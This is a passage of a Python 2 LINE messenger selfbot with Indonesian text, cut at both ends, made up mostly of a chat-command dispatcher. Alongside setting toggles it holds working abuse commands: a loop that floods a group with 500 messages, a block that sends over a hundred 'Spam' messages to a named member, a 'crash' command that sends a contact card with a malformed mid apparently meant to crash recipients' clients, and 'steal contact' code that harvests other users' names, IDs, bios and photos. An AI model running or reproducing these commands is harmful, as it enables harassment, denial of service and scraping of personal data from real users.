# for s in groups.members:
# if _name in s.displayName:
# print "[Target] Stealed"
# break
# else:
# targets.append(copy)
# if targets == []:
# pass
# else:
# for target in targets:
# try:
# kr.findAndAddContactsByMid(target)
# contact = kr.getContact(target)
# cu = kr.channel.getCover(target)
# path = str(cu)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# kr.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
# kr.sendText(msg.to,"Profile Picture " + contact.displayName)
# kr.sendImageWithURL(msg.to,image)
# kr.sendText(msg.to,"Cover " + contact.displayName)
# kr.sendImageWithURL(msg.to,path)
# wait["steal"] = False
# break
# except:
# pass
if wait["alwayRead"] == True:
if msg.toType == 0:
kr.sendChatChecked(msg.from_,msg.id)
else:
kr.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
kr.sendText(msg.to,"In Blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
kr.sendText(msg.to,"Nothing")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
kr.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
kr.sendText(msg.to,"Not in Blacklist")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
kr.sendText(msg.to,"In Blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
kr.sendText(msg.to,"Done")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
kr.sendText(msg.to,"Done")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
kr.sendText(msg.to,"Done")
elif wait["contact"] == True:
msg.contentType = 0
kr.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = kr.getContact(msg.contentMetadata["mid"])
try:
cu = kr.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
kr.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = kr.getContact(msg.contentMetadata["mid"])
try:
cu = kr.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
kr.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = msg.contentMetadata["postEndUrl"]
kr.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
kr.sendText(msg.to,helpmsg)
else:
kr.sendText(msg.to,helpmsg)
elif msg.text.lower() == 'keyset':
if wait["lang"] == "JP":
kr.sendText(msg.to,keyset)
else:
kr.sendText(msg.to,keyset)
elif msg.text.lower() == 'keygrup':
if wait["lang"] == "JP":
kr.sendText(msg.to,helpgrup)
else:
kr.sendText(msg.to,helpgrup)
# elif msg.text.lower() == 'keyself':
# if wait["lang"] == "JP":
# kr.sendText(msg.to,helpself)
# else:
# kr.sendText(msg.to,helpself)
# elif msg.text.lower() == 'keygrup':
# if wait["lang"] == "JP":
# kr.sendText(msg.to,helpgrup)
# else:
# kr.sendText(msg.to,helpgrup)
# elif msg.text.lower() == 'keyset':
# if wait["lang"] == "JP":
# kr.sendText(msg.to,helpset)
# else:
# kr.sendText(msg.to,helpset)
# elif msg.text.lower() == 'keytran':
# if wait["lang"] == "JP":
# kr.sendText(msg.to,helptranslate)
# else:
# kr.sendText(msg.to,helptranslate)
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
kr.sendText(msg.to, "❂➣Proses.....")
elapsed_time = time.time() - start
kr.sendText(msg.to, "%sseconds" % (elapsed_time))
elif msg.text.lower() == 'crash':
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925',"}
kr.sendMessage(msg)
kr.sendMessage(msg)
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
kr.sendMessage(msg)
elif ".fb" in msg.text:
a = msg.text.replace(".fb","")
b = urllib.quote(a)
kr.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses")
kr.sendText(msg.to, "https://www.facebook.com" + b)
kr.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses")
#======================== FOR COMMAND MODE ON STARTING ==========================#
elif msg.text.lower() == 'mode on':
if wait["protect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protecion Already On")
else:
kr.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protecion Already On")
else:
kr.sendText(msg.to,"Protecion Already On")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already On")
else:
kr.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already On")
else:
kr.sendText(msg.to,"Protection Qr already On")
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already On")
else:
kr.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
kr.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
#======================== FOR COMMAND MODE OFF STARTING ==========================#
elif msg.text.lower() == 'mode off':
if wait["protect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection already Off")
else:
kr.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
kr.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already off")
else:
kr.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already Off")
else:
kr.sendText(msg.to,"Protection Qr already Off")
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already Off")
else:
kr.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already Off")
else:
kr.sendText(msg.to,"Protection Invite already Off")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Cancel already Off")
else:
kr.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Cancel already Off")
else:
kr.sendText(msg.to,"Protection Cancel already Off")
#========================== FOR COMMAND BOT STARTING =============================#
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
wait["contact"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
kr.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
kr.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protecion Already On")
else:
kr.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protecion Already On")
else:
kr.sendText(msg.to,"Protecion Already On")
elif msg.text.lower() == 'qr on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already On")
else:
kr.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already On")
else:
kr.sendText(msg.to,"Protection Qr already On")
elif msg.text.lower() == 'invite on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already On")
else:
kr.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
kr.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
elif msg.text.lower() == 'cancel on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
elif msg.text.lower() == 'autojoin on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
kr.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
kr.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
elif msg.text.lower() == 'autojoin off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
kr.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
kr.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
elif msg.text.lower() == 'protect off':
if wait["protect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection already Off")
else:
kr.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
kr.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
elif msg.text.lower() == 'qr off':
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already off")
else:
kr.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already Off")
else:
kr.sendText(msg.to,"Protection Qr already Off")
elif msg.text.lower() == 'invit off':
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already Off")
else:
kr.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already Off")
else:
kr.sendText(msg.to,"Protection Invite already Off")
elif msg.text.lower() == 'cancel off':
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Cancel already Off")
else:
kr.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Cancel already Off")
else:
kr.sendText(msg.to,"Protection Cancel already Off")
elif "Grup cancel:" in msg.text:
try:
strnum = msg.text.replace("Grup cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan")
else:
kr.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis")
else:
kr.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Nilai tidak benar")
else:
kr.sendText(msg.to,"Weird value")
elif msg.text.lower() == 'autoleave on':
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto Leave room set to on")
else:
kr.sendText(msg.to,"Auto Leave room already on")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto Leave room set to on")
else:
kr.sendText(msg.to,"Auto Leave room already on")
elif msg.text.lower() == 'autoleave off':
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto Leave room set to off")
else:
kr.sendText(msg.to,"Auto Leave room already off")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto Leave room set to off")
else:
kr.sendText(msg.to,"Auto Leave room already off")
elif msg.text.lower() == 'share on':
if wait["timeline"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Share set to on")
else:
kr.sendText(msg.to,"Share already on")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Share set to on")
else:
kr.sendText(msg.to,"Share already on")
elif msg.text.lower() == 'share off':
if wait["timeline"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Share set to off")
else:
kr.sendText(msg.to,"Share already off")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Share set to off")
else:
kr.sendText(msg.to,"Share already off")
elif msg.text.lower() == 'status':
md = """╔═════════════\n"""
if wait["contact"] == True: md+="Contact:on [✅]\n"
else: md+="Contact:off [❌]\n"
if wait["autoJoin"] == True: md+="Auto Join:on [✅]\n"
else: md +="Auto Join:off [❌]\n"
if wait["autoCancel"]["on"] == True:md+="Auto cancel:" + str(wait["autoCancel"]["members"]) + "[✅]\n"
else: md+= "Group cancel:off [❌]\n"
if wait["leaveRoom"] == True: md+="Auto leave:on [✅]\n"
else: md+="Auto leave:off [❌]\n"
if wait["timeline"] == True: md+="Share:on [✅]\n"
else:md+="Share:off [❌]\n"
if wait["autoAdd"] == True: md+="Auto add:on [✅]\n"
else:md+="Auto add:off [❌]\n"
if wait["protect"] == True: md+="Protect:on [✅]\n"
else:md+="Protect:off [❌]\n"
if wait["linkprotect"] == True: md+="Link Protect:on [✅]\n"
else:md+="Link Protect:off [❌]\n"
if wait["inviteprotect"] == True: md+="Invitation Protect:on [✅]\n"
else:md+="Invitation Protect:off [❌]\n"
if wait["cancelprotect"] == True: md+="Cancel Protect:on [✅]\n"
else:md+="Cancel Protect:off [❌]\n╚═════════════"
kr.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
kr.sendMessage(msg)
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
kr.sendMessage(msg)
kr.sendText(msg.to,'Creator yang manis ganteng dan kalem ')
elif msg.text.lower() == 'autoadd on':
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto add set to on")
else:
kr.sendText(msg.to,"Auto add already on")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto add set to on")
else:
kr.sendText(msg.to,"Auto add already on")
elif msg.text.lower() == 'autoadd off':
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto add set to off")
else:
kr.sendText(msg.to,"Auto add already off")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto add set to off")
else:
kr.sendText(msg.to,"Auto add already off")
elif "Pesan set:" in msg.text:
wait["message"] = msg.text.replace("Pesan set:","")
kr.sendText(msg.to,"We changed the message")
elif msg.text.lower() == 'pesan cek':
if wait["lang"] == "JP":
kr.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
else:
kr.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
kr.sendText(msg.to,"Merupakan string yang tidak bisa diubah")
else:
wait["comment"] = c
kr.sendText(msg.to,"Ini telah diubah\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Aku berada di")
else:
kr.sendText(msg.to,"To open")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Comment Actived")
else:
kr.sendText(msg.to,"Comment Has Been Active")
elif msg.text in ["Come off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Hal ini sudah off")
else:
kr.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Off")
else:
kr.sendText(msg.to,"To turn off")
elif msg.text in ["Com","Comment"]:
kr.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
kr.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
kr.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
kr.sendText(msg.to,"Nothing in the blacklist")
else:
kr.sendText(msg.to,"The following is a blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +kr.getContact(mi_d).displayName + "\n"
kr.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
kr.sendText(msg.to,"Jam already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = kr.getProfile()
profile.displayName = wait["cName"] + nowT
kr.updateProfile(profile)
kr.sendText(msg.to,"Jam set on")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
kr.sendText(msg.to,"Jam already off")
else:
wait["clock"] = False
kr.sendText(msg.to,"Jam set off")
elif "Jam say:" in msg.text:
n = msg.text.replace("Jam say:","")
if len(n.decode("utf-8")) > 30:
kr.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
kr.sendText(msg.to,"Nama Jam Berubah menjadi:" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = kr.getProfile()
profile.displayName = wait["cName"] + nowT
kr.updateProfile(profile)
kr.sendText(msg.to,"Diperbarui")
else:
kr.sendText(msg.to,"Silahkan Aktifkan Jam")
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr.sendImageWithURL(msg.to,path)
except:
pass
#========================== FOR COMMAND BOT FINISHED =============================#
elif "Spam change:" in msg.text:
if msg.toType == 2:
wait["spam"] = msg.text.replace("Spam change:","")
kr.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.toType == 2:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
kr.sendText(msg.to,"spam changed")
else:
kr.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.toType == 2:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
kr.sendText(msg.to, wait["spam"])
#=====================================
elif "Spam " in msg.text:
if msg.toType == 2:
bctxt = msg.text.replace("Spam ", "")
t = kr.getAllContactIds()
t = 500
while(t):
kr.sendText(msg.to, (bctxt))
t-=1
#==============================================
elif "Spamcontact @" in msg.text:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(msg.to, "Done")
print " Spammed !"
#==============================================================================#
elif msg.text in ["Invite"]:
wait["invite"] = True
kr.sendText(msg.to,"Send Contact")
elif msg.text in ["Steal contact"]:
wait["contact"] = True
kr.sendText(msg.to,"Send Contact")
elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama
print "[Command]Like executed"
kr.sendText(msg.to,"Like Status Owner")
try:
likeme()
except:
pass
elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman
print "[Command]Like executed"
kr.sendText(msg.to,"Like Status Teman")
try:
likefriend()
except:
pass
elif msg.text in ["Like:on","Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Already")
elif msg.text in ["Like off","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Already")
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
kr.sendText(msg.to,"Simi mode On")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
kr.sendText(msg.to,"Simi mode Off")
elif msg.text in ["Autoread on","Read:on"]:
wait['alwayRead'] = True
kr.sendText(msg.to,"Auto read On")
elif msg.text in ["Autoread off","Read:off"]:
wait['alwayRead'] = False
kr.sendText(msg.to,"Auto read Off")
elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
kr.sendText(msg.to,"Auto respon tag On")
elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
kr.sendText(msg.to,"Auto respon tag Off")
elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
kr.sendText(msg.to,"Auto Kick tag ON")
elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
kr.sendText(msg.to,"Auto Kick tag OFF")
elif "Time" in msg.text:
if msg.toType == 2:
kr.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
#==============================================================================#
elif msg.text in ["Datang on","datang on"]:
if wait["Wc"] == True:
if wait["lang"] == "JP":
